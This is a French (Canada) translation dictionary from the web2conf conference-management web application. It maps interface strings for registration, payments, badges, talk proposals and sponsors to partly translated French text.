# source: reingart/web2conf_googlecode (refs/heads/master), languages/fr-ca.py
# coding: utf8
{
'\nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n\n--\n%s\n': '\nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n\n--\n%s\n',
'\nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n--\n%s\n': '\nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n--\n%s\n',
' \nDear Attendee,\n\nTo complete your registratio to the event, click on the following link:\n\n%s\n\n%s\n': ' \nDear Attendee,\n\nTo complete your registration to the event, click on the following link:\n\n%s\n\n%s\n',
' \nDear Attendee,\n\nTo complete your registratio, click on the following link:\n\n%s\n\n--\n%s\n': ' \nDear Attendee,\n\nTo complete your registration, click on the following link:\n\n%s\n\n--\n%s\n',
' \nDear Attendee,\n\nTo complete your registration, click on the following link:\n\n%s\n\n--\n%s\n': ' \nDear Attendee,\n\nTo complete your registration, click on the following link:\n\n%s\n\n--\n%s\n',
' \nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n\n--\n%s\n': ' \nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n\n--\n%s\n',
' %s:\n\n %s\n\n\n Please do not respond this automated message\n %s\n ': ' %s:\n\n %s\n\n\n Please do not respond to this automated message\n %s\n ',
' Below is a complete list of companies representede at the conference. Some companies do not wish to make their attendance publie. This list is accessible by managers only.': ' Below is a complete list of companies represented at the conference. Some companies do not wish to make their attendance public. This list is accessible by managers only.',
'!langcode!': 'fr-ca',
'!langname!': 'Français (Canada)',
'# Reviews': '# Reviews',
'%(days)s days, %(hours)s hours, %(minutes)s minutes': '%(days)s days, %(hours)s hours, %(minutes)s minutes',
'%0.2f': '%0.2f',
'%5d Completed Registrations': '%5d Completed Registrations',
'%5d Pending Registrations': '%5d Pending Registrations',
'%5d Total Paid and Pending Registrations': '%5d Total Paid and Pending Registrations',
'%s days left': '%s days left',
'%s people have registered for PyCon 2009': '%s personnes se sont inscrites pour PyCon 2009',
'%s Recent Tweets': '%s Recent Tweets',
'%s Registration Confirmation': '%s Registration Confirmation',
'%s Registration Password': '%s Registration Password',
'%s registrations so far': '%s registrations so far',
'%s rows deleted': '%s rows deleted',
'%s rows updated': '%s rows updated',
'%s submission closed on %s': '%s submission closed on %s',
'%s to %s': '%s to %s',
'%s:\n%s\n\nPlease do not respond this automated message\n%s': '%s:\n%s\n\nPlease do not respond to this automated message\n%s',
'%Y-%m-%d': '%d-%m-%Y',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(': '(',
'(%s)': '(%s)',
'(address required for PSF donation receipt; also see %s)': '(une adresse de correspondance est nécessaire pour recevoir un reçu de don au PSF. Voyez aussi %s) :',
'(airports codes, bus stations, etc.)': '(airports codes, bus stations, etc.)',
'(also used for attendee mapping)': '(aussi utilisé pour situer les personnes présentes)',
'(cellphone)': '(cellphone)',
'(cost TBD)': '(cost TBD)',
'(datallar un inventario del equipo, a efectos del ingreso al recinto y facilitar la instalación. Incluir: Placa de red, video, sonido, módem (marcas, modelos, configuración); CPU (Procesador); Memoria RAM)': '(datallar un inventario del equipo, a efectos del ingreso al recinto y facilitar la instalación. Incluir: Placa de red, video, sonido, módem (marcas, modelos, configuración); CPU (Procesador); Memoria RAM)',
'(dates, airports codes, bus stations, etc.)': '(dates, airports codes, bus stations, etc.)',
'(discounts)': '(discounts)',
'(explain why)': '(explain why)',
'(for map)': '(for map)',
'(i.e. position)': '(i.e. position)',
'(ie. interests)': '(ie. interests)',
'(If paying for others but not attending yourself, register yourself as "Not Attending")': "(Si vous payez pour d'autres personnes, mais vous ne venez pas vous-même, inscrivez-vous avec « N'assiste pas ») :",
'(if popups are blocked)': '(if popups are blocked)',
'(if you subscribte to the link, your calendar application will be automatically updated)': '(if you subscribe to the link, your calendar application will be automatically updated)',
'(in ARS pesos)': '(in ARS pesos)',
'(limited seats)': '(limited seats)',
'(logo for badge)': '(logo for badge)',
'(new filename for downloads)': '(new filename for downloads)',
'(only for registered users)': '(only for registered users)',
'(optional)': '(optional)',
'(required for speakers)': '(required for speakers)',
'(required if you need a certificate)': '(required if you need a certificate)',
'(required)': '(requis)',
'(required, for badge)': '(nécessaire pour le porte-nom)',
'(see %s)': '(voyez %s)',
'(selecciona la distribución a instalar)': '(selecciona la distribución a instalar)',
'(seleccione su preferencia de charlas para estimar cupo de asistentes; ': '(seleccione su preferencia de charlas para estimar cupo de asistentes; ',
'(seleccione su preferencia de charlas para la organización del evento; ': '(seleccione su preferencia de charlas para la organización del evento; ',
'(subscribte to that link to get updates in your calendar application automatically)': '(subscribe to that link to get updates in your calendar application automatically)',
', la disponibilidad y horarios pueden variar sin previo aviso)': ', la disponibilidad y horarios pueden variar sin previo aviso)',
'1 Day': '1 jour',
'2 Days': '2 jours',
'3 Days': '3 jours',
'4 Days': '4 jours',
'; first tutorial costs $120, additional tutorials cost $80)': ', la première leçon coûte 120 $, chaque leçon additionnelle coûte 80 $) :',
'<b><font color="red">Applications are no longer being accepted.</b><br>(Financial Aid Application deadline: %s)</font>': '<b><font color="red">Applications are no longer being accepted.</b><br>(Financial Aid Application deadline: %s)</font>',
'<b><font color="red">Applications are no longer being accepted.</b><br>(Financial Aid Application deadline: 23 February 2009)</font>': '<b><font color="red">Applications are no longer being accepted.</b><br>(Financial Aid Application deadline: 23 February 2009)</font>',
'@%s Recent Tweets': '@%s Recent Tweets',
'A money order in USD and depositable in a US bank is also acceptable.': 'Un mandat-carte, payable en dollars américains et qui peut être déposé dans une banque américaine, est également acceptable.',
'A new window will open with the sample badge in PDF': 'A new window will open with the sample badge in PDF',
'A review of your activity %(activity)s has been created or updated by %(user)s.': 'A review of your activity %(activity)s has been created or updated by %(user)s.',
'About': 'À propos',
'About PyConAr Sponsors': 'About PyConAr Sponsors',
'About the software of this site': 'About the software of this site',
'About this software': 'À propos de ce logiciel',
'Abstract': 'Abstract',
'Accepted Activities': 'Accepted Activities',
'Accepted Talks': 'Présentations acceptées',
'Access for site managers': 'Access for site managers',
'Accomodation': 'Accomodation',
'Activities': 'Activities',
'ACTIVITY': 'ACTIVITY',
'Activity': 'Activity',
'Activity %(activity)s review': 'Activity %(activity)s review',
'Activity %s Confirmed. Thank you!': 'Activity %s Confirmed. Thank you!',
'Activity Info': 'Activity Info',
'Activity Proposal': 'Activity Proposal',
'Add a comment on this Activity': 'Add a comment on this Activity',
'Add a comment on this Talk': 'Add a comment on this Talk',
'Add Author': 'Add Author',
'add author': 'add author',
'Add/remove tutorials': 'Ajouter/enlever des leçons',
'Added to Reviewer Group!': 'Added to Reviewer Group!',
'Additional Donation': 'Additional Donation',
'Additional remarks': 'Additional remarks',
'Advanced': 'Advanced',
'After completing this form you will receive a verification message by email. Follow the link therein, login with the email/password you chose below and you will be redirected to a payment form. You will be able to pay by credit card using Google Checkout. Register as non-attending in order to register and pay for other people.': "Après avoir rempli ce formulaire, vous allez recevoir un message de confirmation par courriel. Ce courriel va contenir un lien. Suivez le lien et ouvrez une session en utilisant l'adresse de courriel et le mot de passe que vous allez choisir ci-dessous. Vous serez redirigé vers un formulaire de paiement. Vous devrez utiliser Google Checkout pour payer par carte de crédit. Si nécessaire, inscrivez-vous avec « Je n'assiste pas » si vous voulez seulement enregistrer et payer pour d'autres personnes.",
'All registered attendees will receive free of charge:': 'All registered attendees will receive free of charge:',
'Already in the Reviewer Group!': 'Already in the Reviewer Group!',
'alta calidad /medium': 'alta calidad /medium',
'alta calidad/large': 'alta calidad/large',
'alta calidad/small': 'alta calidad/small',
'alta calidad/xlarge': 'alta calidad/xlarge',
'alta calidad/xxlarge': 'alta calidad/xxlarge',
'alta calidad/xxxlarge': 'alta calidad/xxxlarge',
'Amount': 'Amount',
'Amount paid by you': 'Montant payé par vous',
'Amount paid for you by somebody else': "Montant payé pour vous par quelqu'un d'autre",
'An error occured, please %s the page': 'An error occurred, please %s the page',
'and mail it to:': "et l'envoyer à:",
'Are you human?': 'Êtes-vous humain?',
'Are you sure you want to delete this object?': 'Are you sure you want to delete this object?',
'Articles': 'Articles',
'attach': 'attach',
'Attach': 'Attacher',
'Attach a file to this Activity': 'Attach a file to this Activity',
'Attach a file to this Talk': 'Attach a file to this Talk',
'Attachments': 'Fichiers joints',
'Attendee Locations': 'Localisations des personnes présentes',
'Attendee Mail-List': 'Attendee Mail-List',
'Attendee registered and balance transferred': 'Personne présente enregistrée et solde de compte transféré',
'Attendees': 'Personnes présentes',
'Attending InstallFest': 'Attending InstallFest',
'Attending Sprints': "Sprints d'assistances",
'Author': 'Author',
'author': 'author',
'Authors': 'Authors',
'Average': 'Average',
'Back to inbox': 'Back to inbox',
'Back to the events list': 'Back to the events list',
'Back to the options list': 'Back to the options list',
'Back to the project list': 'Back to the project list',
'Back to the projects list': 'Back to the projects list',
'Badge': 'Badge',
'Badge Line 1': 'Ligne 1 du porte-nom',
'Badge Line 2': 'Ligne 2 du porte-nom',
'Badge Name': 'Nom sur porte-nom',
'badge, certificate, program guide, community magazine': 'badge, certificate, program guide, community magazine',
'badge, certificate, program guide, community magazine and special benefits': 'badge, certificate, program guide, community magazine and special benefits',
'Badges': 'Porte-noms',
'baja calidad /medium': 'baja calidad /medium',
'baja calidad/large': 'baja calidad/large',
'baja calidad/small': 'baja calidad/small',
'baja calidad/xlarge': 'baja calidad/xlarge',
'baja calidad/xxlarge': 'baja calidad/xxlarge',
'baja calidad/xxxlarge': 'baja calidad/xxxlarge',
'Balance transferred': 'Solde de compte transféré',
'Bank account transfer': 'Bank account transfer',
'Beginner': 'Beginner',
'Below is a complete list of companies representede at the conference. Some companies do not wish to make their attendance publie. This list is accessible by managers only.': 'Below is a complete list of companies represented at the conference. Some companies do not wish to make their attendance public. This list is accessible by managers only.',
'Below is a partial list of companies represented at the conference, who wished to make their attendance public. The list is sorted by company name.': 'Ci-dessous est une liste partielle des entreprises représentées à la conférence. La liste comprend seulement les entreprises qui voulaient que leurs noms paraissent dans la liste. La liste est triée par le nom de la société.',
"Below is a partial list of conference attendees, showing everyone who wished to make their attendance public. The list is sorted by the attendee's name.": 'Ci-dessous est une liste partielle des personnes présentes à la conférence. La liste comprend seulement les personnes qui voulaient que leurs noms soient publiés. La liste est triée par le nom de la personne présente.',
'Below is the complete list, as accessible to managers only.': 'Ci-dessous est la liste complète, ce qui est seulement accessible par les gestionnaires.',
'Blog': 'Blog',
'Blog href': 'Blog href',
'Body': 'Body',
'Bookmark the activities you want to attend': 'Bookmark the activities you want to attend',
'boolean': 'boolean',
'Booths': 'Booths',
'break': 'break',
'Breakdown by person': 'Répartition par personne',
'Brief': 'Brief',
'Built using': 'Built using',
'by': 'by',
'Cancel': 'Cancel',
'cancel': 'annuler',
'Cancelled': 'Cancelled',
'Cash (or third party cash services': 'Cash (or third-party cash services)',
'Cash (Oxxo or 7Eleven)': 'Cash (Oxxo or 7Eleven)',
'Categories': 'Categories',
'cc': 'cc',
'Certificate': 'Certificate',
'Certificate cost is $5.-': 'Certificate cost is $5.-',
'Certificates': 'Certificates',
'Charts': 'Tableaux',
'City': 'Ville',
'City Tour': 'City Tour',
'click here': 'click here',
'close': 'close',
'comment': 'comment',
'Comments': 'Commentaires',
'Community Booths': 'Community Booths',
'Companies': 'Entreprises',
'Companies represented': 'Entreprises représentées',
'Company': 'Company',
'Company Home Page': "Page d'accueil de l'entreprise",
'Company Name': "Nom de l'entreprise",
'company, university': 'company, university',
'Complete the Sponsor form': 'Complete the Sponsor form',
'Conference': 'Conférence',
'Conference description<b>dates</b> city (organized by <a href="#">users group</a>). <br/>\nMore info: <a href="#">blog</a> Contact: <a href="#">mail address</a>': 'Conference description<b>dates</b> city (organized by <a href="#">users group</a>). <br/>\nMore info: <a href="#">blog</a> Contact: <a href="#">mail address</a>',
'Conference events': 'Conference events',
'Conference Participants': 'Participant(e)s de la conférence',
'Confirm': 'Confirm',
'confirm': 'confirm',
'Confirm attendance': 'Confirm attendance',
'Confirm my assistance': 'Confirm my assistance',
'confirmed': 'confirmed',
'Confirmed!': 'Confirmed!',
'Contact': 'Contact',
'Contacto con Auspiciantes': 'Contacto con Auspiciantes',
'Corporate/Government (early), $450': "Société ou entreprise d'État (inscription hâtive), 450 $",
'Corporate/Government (on site), $650': "Société ou entreprise d'État (sur place), 650 $",
'Corporate/Government (regular), $550': "Société ou entreprise d'État (régulier), 550 $",
'corporation, university, user group, etc.': 'corporation, university, user group, etc.',
'Correct': 'Correct',
'cost TBD': 'cost TBD',
'Could not send the tweet': 'Could not send the tweet',
'Country': 'Country',
'Coupon code': 'Coupon code',
'Coupon does not exist!': 'Coupon does not exist!',
'Coupon is already used!': 'Coupon is already used!',
'Create a new account using social networks single sign-on': 'Create a new account using social networks single sign-on',
'Create a non-attending registration for yourself first!': 'Create a non-attending registration for yourself first!',
'Create a traditional account using email/password': 'Create a traditional account using email/password',
'Create or update your<br><b>payment</b>': 'Create or update your<br><b>payment</b>',
'Created By': 'Created By',
'Created On': 'Created On',
'Created Signature': 'Created Signature',
'Credit card': 'Credit card',
'Credited': 'Credited',
'Credited payments': 'Credited payments',
'CRUD': 'CRUD',
'CSV for Badges': 'Fichier CSV pour les porte-noms',
'Current posted events': 'Current posted events',
'CV': 'CV',
'data uploaded': 'données téléversées',
'date': 'date',
'Date': 'Date',
'Date and time of submission': 'Date and time of submission',
'datetime': 'datetime',
'db': 'base de données',
'Deadline to join reviewers group was %s': 'Deadline to join reviewers group was %s',
'Dear attendee': 'Dear attendee',
'describe why you want to come to PyCon': 'describe why you want to come to PyCon',
'Description': 'Description',
'design': 'design',
'Desmarcar si no desea que los Auspiciantes de la conferencia tengan acceso a sus datos de contacto': 'Desmarcar si no desea que los Auspiciantes de la conferencia tengan acceso a sus datos de contacto',
'Detallar un inventario del equipo, a efectos del ingreso al recinto y facilitar la instalación. Incluir: Placa de red, video, sonido, módem (marcas, modelos, configuración); CPU (Procesador); Memoria RAM': 'Detallar un inventario del equipo, a efectos del ingreso al recinto y facilitar la instalación. Incluir: Placa de red, video, sonido, módem (marcas, modelos, configuración); CPU (Procesador); Memoria RAM',
'DineroMail': 'DineroMail',
'DineroMail funds': 'DineroMail funds',
'Discount Coupon': 'Coupon de réduction',
'Distinguished speakers': 'Distinguished speakers',
'Donation to PSF': 'Faire un don au PSF',
'Donation to PyAr': 'Donation to PyAr',
'Done!': 'Done!',
'done!': 'fini!',
'double': 'double',
'Download your bookmarks': 'Download your bookmarks',
'Duration': 'Duration',
'Duration in minutes': 'Duration in minutes',
'Each time you submit or update your application, it is emailed to you and the Financial Aid Administrator.': 'Each time you submit or update your application, it is emailed to you and the Financial Aid Administrator.',
'edit': 'edit',
'Edit': 'Edit',
'Edit event': 'Edit event',
'Edit option': 'Edit option',
'Edit your Badge': 'Edit your Badge',
'Edit Your Financial Aid Application': "Modifier votre demande d'aide financière",
'Edit your profile and preferences': 'Modifier votre profil et vos préférences',
'El Costo de Certificado es $x.-': 'El Costo de Certificado es $x.-',
'email': 'email',
'Email': 'Email',
'Email verified': 'Courriel vérifié',
'End time': 'End time',
'Entity Home Page': 'Entity Home Page',
'Entity Name': 'Entity Name',
'Error parsing request data %s': 'Error parsing request data %s',
'Event': 'Event',
'Event Proposal': 'Event Proposal',
'Events': 'Events',
'Expenses': 'Expenses',
'Explore': 'Explore',
'Expo Hall': 'Expo Hall',
'Extreme': 'Extreme',
'extreme talk': 'extreme talk',
'extreme_talk': 'extreme_talk',
'FA-(email all)': 'FA-(envoyez courriel à tous)',
'FA-CSV': 'FA-CSV',
'Family Name': 'Nom de famille',
'Fees': 'Frais',
'File': 'File',
'Financial Aid': 'Financial Aid',
'Financial Aid Online Application': "Demande d'aide financière en ligne",
'Financial Analysis': 'Analyse financière',
'Financials': 'Finances',
'First Name': 'First Name',
'Following is a copy of the submitted data': 'Following is a copy of the submitted data',
'Food Preference': 'Préférences alimentaires',
'For more information, please see': 'For more information, please see',
'Format': 'Format',
'From': 'Adresse émettrice',
'from %s': 'from %s',
'Full Google Calendar': 'Full Google Calendar',
'full schedule (customizable!)': 'full schedule (customizable!)',
'full schedule (reserve your seat!)': 'full schedule (reserve your seat!)',
'general': 'general',
'General Information': 'General Information',
'Given Name': 'Prénom',
'Google Checkout accepts Visa, MasterCard, American Express and Discover. For more information, see ': "Google Checkout accepte Visa, MasterCard, American Express et Discover. Pour plus d'information, voir :",
'Google Checkout Buyer Help.': "Aide d'achat pour Google Checkout.",
'Gratuito, $0': 'Gratuito, $0',
'halal': 'halal',
'Hello': 'Bonjour',
'Help': 'Help',
'Here is a partial list of conference attendees, showing everyone who wished to make their attendance public.': 'Here is a partial list of conference attendees, showing everyone who wished to make their attendance public.',
'History': 'History',
'Hobbyist (early), $250': 'Amateur (inscription hâtive), 250 $',
'Hobbyist (on site), $450': 'Amateur (sur place), 450 $',
'Hobbyist (regular), $350': 'Amateur (régulier), 350 $',
'Home': 'Home',
'Hotel where Staying': 'Hôtel où vous restez',
"How to Pay somebody else's fees": "Comment payer les frais de quelqu'un d'autre",
'How to Register somebody else and pay their fees': 'Comment inscrire une autre personne et payer ses frais :',
'I need a time extension': 'I need a time extension',
'I want a certificate of attendance': 'I want a certificate of attendance',
"I'm interested (joining is optional)": "I'm interested (joining is optional)",
'ID': 'ID',
'Id': 'Id',
'If checked, your Name, Company and Location will be displayed publicly': 'If checked, your Name, Company and Location will be displayed publicly',
'If you have pedning payments (SUBMITTED status) reload this page to change for status change. Your due amount will be updated when the payment is CHARGED.': 'Si vous avez des paiements en attente (statut SOUMIS), veuillez recharger cette page pour voir les changements. Votre solde de compte sera mis à jour lorsque le paiement est porté à votre compte.',
'If you have pending payments (new status), reload this page to check for status updates. ': 'If you have pending payments (new status), reload this page to check for status updates. ',
'If you have pending payments (SUBMITTED status), reload this page to check for status updates. The amount due will be updated when the payment is CHARGED.': 'Si vous avez des paiements en attente (statut SOUMIS), veuillez recharger cette page pour voir les changements. Votre solde de compte sera mis à jour lorsque le paiement est porté à votre compte.',
'If you intend to apply, please use the ': "Si vous avez l'intention de faire une demande, veuillez utiliser le",
'If you want you can upload your CV to be available to our Sponsors in further laboral searchs:': 'If you want, you can upload your CV so it is available to our Sponsors for future job searches:',
'If you wish to pay by check, please send a check drawn on a US bank for US$%0.2f payable to:': "Si vous souhaitez payer par chèque, veuillez nous envoyer un chèque de %0.2f $ US tiré sur une banque américaine, payable à :",
'In order to apply for financial aid, we need a bit of information from you, in the form below.': 'In order to apply for financial aid, we need a bit of information from you, in the form below.',
'Inbox': 'Inbox',
'Include in Delegates List': 'Inclure dans la liste des représentants',
'Index': 'Index',
'info': 'info',
'Insert New': 'Insérer nouveau',
'Insert new': 'Insert new',
'InstallFest Hardware': 'InstallFest Hardware',
'InstallFest Operating System': 'InstallFest Operating System',
'integer': 'integer',
'Intermediate': 'Intermediate',
'Invalid account number': 'Invalid account number',
'Invalid account or password': 'Invalid account or password',
'Invalid operation': 'Opération invalide',
'Invalid password': 'Invalid password',
'Invalid Query': 'Invalid Query',
'Invalid query type': 'Invalid query type',
'invalid request': 'demande invalide',
'invalid SQL FILTER': 'filtre SQL invalide',
'invalid SQL FILTER or UPDATE STRING': 'filtre ou chaîne de mise à jour SQL invalide',
'Invalid URL': 'Adresse URL invalide',
'invalid!': 'invalide!',
'Invoice': 'Invoice',
'Ivalid operation ID': 'Invalid operation ID',
'Job Fair': 'Job Fair',
'Jobs': 'Jobs',
'Join': 'Join',
'keynote': 'keynote',
'Keynote': 'Keynote',
'Keynotes': 'Keynotes',
'kosher': 'cacher',
'Language': 'Language',
'large': 'large',
'last modification: %s': 'last modification: %s',
'Last Name': 'Last Name',
'Learn how to<br>become a <b>sponsor</b>': 'Learn how to<br>become a <b>sponsor</b>',
'Learn how to<br>submit a <b>project</b>': 'Learn how to<br>submit a <b>project</b>',
'Legend:': 'Legend:',
'Level': 'Level',
'License': 'License',
'lightning talk': 'lightning talk',
'Lightning Talks': 'Lightning Talks',
'link': 'link',
'List of generated payments': 'List of generated payments',
'List of mismatching activity names voted': 'List of mismatching activity names voted',
'List of submitted payments': 'Liste des paiements soumis',
'loading...': 'loading...',
'Location': 'Location',
'log in using social network profile': 'log in using social network profile',
'log in using username and password': 'log in using username and password',
'Login': 'Ouvrir une session',
'login using username and password': 'login using username and password',
'Logout': 'Fermer une session',
'lost your password?': 'lost your password?',
'Mailing Address': 'Mailing Address',
'Mailing Address Line 1': 'Adresse de correspondance, ligne 1',
'Mailing Address Line 2': 'Adresse de correspondance, ligne 2',
'Main': 'Main',
'Malformed': 'Malformed',
'Manage': 'Gérer',
'Many categories (needs filters)': 'Many categories (needs filters)',
'Maps': 'Cartes',
'Marked in schedule on %s': 'Marked in schedule on %s',
'medium': 'medium',
"men's/2xlarge": 'pour homme/xx-large',
"men's/3xlarge": 'pour homme/xxx-large',
"men's/large": 'pour homme/large',
"men's/medium": 'pour homme/moyen',
"men's/small": 'pour homme/petit',
"men's/xlarge": 'pour homme/x-large',
'Message': 'Message',
'Message: %(noops)s. Error: %(error)s': 'Message: %(noops)s. Error: %(error)s',
'min': 'min',
'Mind that a submitted payment may take time to be processed. It may take up to one hour to process a payment. Do not pay twice unless your payment is explicitly declined. You can find the status of your payments below.': "Veuillez noter que ça peut prendre jusqu'à une heure pour qu'un paiement soit traité. Ne payez pas deux fois à moins que votre paiement ait été explicitement refusé. Vous pouvez trouver l'état de vos paiements ci-dessous.",
'Mind that a sumitted payment may take time to be processed. It may take up to one hour to process a payment. Do not pay twice unless your payment is explicitly declined. You can find the status of your payments below.': "Veuillez noter que ça peut prendre jusqu'à une heure pour qu'un paiement soit traité. Ne payez pas deux fois à moins que votre paiement ait été explicitement refusé. Vous pouvez trouver l'état de vos paiements ci-dessous.",
'Modified By': 'Modified By',
'Modified On': 'Modified On',
'Money Transfers': "Transferts d'argent",
'more': 'more',
'More Information': 'More Information',
'name': 'name',
'Name': 'Name',
'Nearest events': 'Nearest events',
'need to register?': 'need to register?',
'New activity proposal %(activity)s': 'New activity proposal %(activity)s',
'new record inserted': 'nouveau dossier inséré',
'No': 'Non',
'No message found': 'No message found',
'No operations found': 'No operations found',
'No operations updated': 'No operations updated',
'No payment due at this time': 'Aucun paiement exigé en ce moment',
'No payment records found for code %s': 'No payment records found for code %s',
'No payment records found for codes %s (%s)': 'No payment records found for codes %s (%s)',
'No payments!': 'No payments!',
'no records': 'aucuns dossiers',
'no, thanks': 'no, thanks',
'Nobody registered for tutorials': "Personne ne s'est enregistré pour les leçons",
'noname': 'noname',
'normal': 'normal',
'Not Attending, $0': "N'assiste pas, 0 $",
'Not authorized to view a event if not own!': 'Not authorized to view an event that is not your own!',
'Not Autorized!': 'Not Authorized!',
'Not Confirmed, please enter into your profile and check %s field': 'Not Confirmed, please enter into your profile and check %s field',
"Not Confirmed, please enter into your profile and check '%s' field": "Not Confirmed, please enter into your profile and check '%s' field",
'Not implemented': 'Not implemented',
'Notes': 'Notes',
'Number': 'Number',
'Nª': 'Nª',
'only used for sprints)': 'only used for sprints)',
'open space': 'open space',
'Open Space': 'Open Space',
'Open Spaces': 'Open Spaces',
'open-space': 'open-space',
'Operation number': 'Operation number',
'Option changed': 'Option changed',
'Order': 'Order',
'Organizer': 'Organizer',
'Other people conference fees': "Les frais de conférence d'autres personnes",
"Other people's conference fees": "Les frais de conférence d'autres personnes",
'our estimate of attendance reaches the room size, last remaining seats!': 'our estimate of attendance reaches the room size, last remaining seats!',
'Page format converted!': 'Page format converted!',
'Page History': 'Page History',
'Page Not Found': 'Page Not Found',
'Page Not Found!': 'Page Not Found!',
'Page Preview': 'Page Preview',
'Page saved': 'Page saved',
'panel': 'panel',
'paper': 'paper',
'Partakers of %s': 'Partakers of %s',
'password': 'password',
'Password': 'Password',
'Pay': 'Pay',
'Pay by check': 'Payer par chèque',
'Pay for somebody else': "Payer pour quelqu'un d'autre",
'pay now': 'payez maintenant',
'Payment cancelled': 'Paiement annulé',
'Payment expected': 'Paiement exigé',
'Payments': 'Paiements',
'Payments query result': 'Payments query result',
'Pending': 'Pending',
'Personal Home Page': "Page d'accueil personnelle",
'Pesos/Reales': 'Pesos/Reales',
'Phone Number': 'Numéro de téléphone',
'Photo': 'Photo',
'Planet News': 'Planet News',
'Please enter your e-mail address; a new password will be sent to you.': 'Veuillez entrer votre adresse courriel; un nouveau mot de passe vous sera envoyé.',
'Please note that a submitted payment may take time to be processed. It may take up to one hour to process a payment. Do not pay twice unless your payment is explicitly declined. You can find the status of your payments below.': "Veuillez noter que ça peut prendre jusqu'à une heure pour qu'un paiement soit traité. Ne payez pas deux fois à moins que votre paiement ait été explicitement refusé. Vous pouvez trouver l'état de vos paiements ci-dessous.",
'Please note that a sumitted payment may take time to be processed. It may take up to one hour to process a payment. Do not pay twice unless your payment is explicitly declined. You can find the status of your payments below.': "Veuillez noter que ça peut prendre jusqu'à une heure pour qu'un paiement soit traité. Ne payez pas deux fois à moins que votre paiement ait été explicitement refusé. Vous pouvez trouver l'état de vos paiements ci-dessous.",
'Please read these instructions BEFORE submitting your application.': 'Please read these instructions BEFORE submitting your application.',
'Please remember to fill the note field if you need more time.': 'Please remember to fill the note field if you need more time.',
'Please see': 'Please see',
'plenary': 'plenary',
'Posted': 'Posted',
'poster': 'poster',
'Powered by': 'Powered by',
'Powered by web2py': 'Powered by web2py',
'Presenter': 'Presenter',
'Press Release': 'Press Release',
'Preview': 'Preview',
'Privacy policy': 'Privacy policy',
'Profile': 'Profil',
'project': 'project',
'Projects': 'Projects',
'Proposal': 'Proposal',
'Proposals': 'Proposals',
'Propose talk': 'Propose talk',
'Proposed Activities': 'Proposed Activities',
'Proposed Talks': 'Présentations proposées',
'Prospectus': 'Prospectus',
'Publicize': 'Publicize',
'PyConAr Blog': 'PyConAr Blog',
'PyConAr Sprint Projects': 'PyConAr Sprint Projects',
'Python knowledge level': 'Python knowledge level',
'Ranking': 'Ranking',
'Rating': 'Rating',
'Rating %(rating)s from user %(created_signature)s on %(created_on)s, says: %(body)s': 'Rating %(rating)s from user %(created_signature)s on %(created_on)s, says: %(body)s',
'Rating %(rating)s: %(body)s': 'Rating %(rating)s: %(body)s',
'Rating Average': 'Rating Average',
'Rating SUM)': 'Rating SUM)',
'Ratings': 'Ratings',
'Ratings Summary': 'Ratings Summary',
"Really...? I'd like to dismiss it.": "Really...? I'd like to dismiss it.",
'record does not exist': "le dossier n'existe pas",
'records deleted': 'dossiers supprimés',
'records updated': 'dossiers mis à jour',
'reference': 'reference',
'Register': 'Enregistrer',
'Register ': 'Register ',
'Register and pay for somebody else': "Enregistrer et payer pour quelqu'un d'autre",
'Registering or paying for others?': 'Registering or paying for others?',
'Registration': 'Registration',
'Registration %s - Confirmation': 'Registration %s - Confirmation',
'Registration date': 'Registration date',
'Registration Form': "Formulaire d'inscription",
'Registration Type': "Sorte d'inscription",
'reload': 'reload',
'remember my twitter password': 'remember my twitter password',
'Request payment update': 'Request payment update',
'Reset Password': 'Réinitialiser le mot de passe',
'Restaurants': 'Restaurants',
'Resume (Bio)': 'Resume (Bio)',
'Resume (CV)': 'Resume (CV)',
'Retrieve Username': 'Retrieve Username',
'review': 'review',
'Review Ratings': 'Review Ratings',
'Review this Activity': 'Review this Activity',
'Review this Event': 'Review this Event',
'Review this Talk': 'Écrire une critique à propos de cette présentation',
'review:': 'review:',
'reviewers': 'reviewers',
'Reviews': 'Critiques',
'Room': 'Room',
'Room Sharing': 'Room Sharing',
'RSS': 'RSS',
'RSS/Atom feed': 'RSS/Atom feed',
'Sample Badge Preview': 'Sample Badge Preview',
'Save': 'Save',
'Schedule': 'Schedule',
'Scheduled Activities': 'Scheduled Activities',
'Scheduled Datetime': 'Scheduled Datetime',
'Scheduled Room': 'Scheduled Room',
'Science': 'Science',
'Science Track': 'Science Track',
'Scientific Track': 'Scientific Track',
'Score': 'Score',
'Search': 'Recherche',
'Search payments by user name': 'Search payments by user name',
'See the partakers list': 'See the partakers list',
'See your<br>badge <b>preview</b>': 'See your<br>badge <b>preview</b>',
'Seleccionar la distribución que desea instalar': 'Seleccionar la distribución que desea instalar',
'Settings': 'Settings',
'Short Biografy and reference (required for speakers)': 'Short Biografy and reference (required for speakers)',
'Short Biography and references (for authors)': 'Short Biography and references (for authors)',
'sign up!': 'sign up!',
'Sign-up': 'Sign-up',
'small': 'small',
'social': 'social',
'Social networks single sign-on': 'Social networks single sign-on',
'Somebody else will pay for me': "Quelqu'un d'autre va payer pour moi",
'Speaker': 'Speaker',
'Speakers': 'Speakers',
'Sponsor': 'Sponsor',
'Sponsor form has errors!': 'Sponsor form has errors!',
'Sponsor Sign Up form': 'Sponsor Sign Up form',
'Sponsor sign-up form successfully processed': 'Sponsor sign-up form successfully processed',
'Sponsors': 'Sponsors',
'Sprint': 'Sprint',
'sprint': 'sprint',
'Sprint Projects': 'Sprint Projects',
'Sprints': 'Sprints',
'Staff': 'Staff',
'stand': 'stand',
'Start time': 'Start time',
'Starts in': 'Starts in',
'startup': 'startup',
'State': 'État',
'state': 'état',
'Stats': 'Statistiques',
'Status': 'Status',
'Status: %s': 'Status: %s',
'string': 'string',
'Student (early), $150': 'Étudiant(e) (tôt), 150 $',
'Student (on site), $250': 'Étudiant(e) (sur le site), 250 $',
'Student (regular), $200': 'Étudiant(e) (régulier), 200 $',
'Student works contest': 'Student works contest',
'Students': 'Students',
'Subject': 'Subject',
'Submit a Activity Proposal': 'Submit a Activity Proposal',
'Submit a Talk Proposal': 'Soumettre une proposition pour une présentation',
'Submitted Sponsors': 'Submitted Sponsors',
'Subtitle': 'Subtitle',
'Summary': 'Summary',
'Summit': 'Summit',
'summit': 'summit',
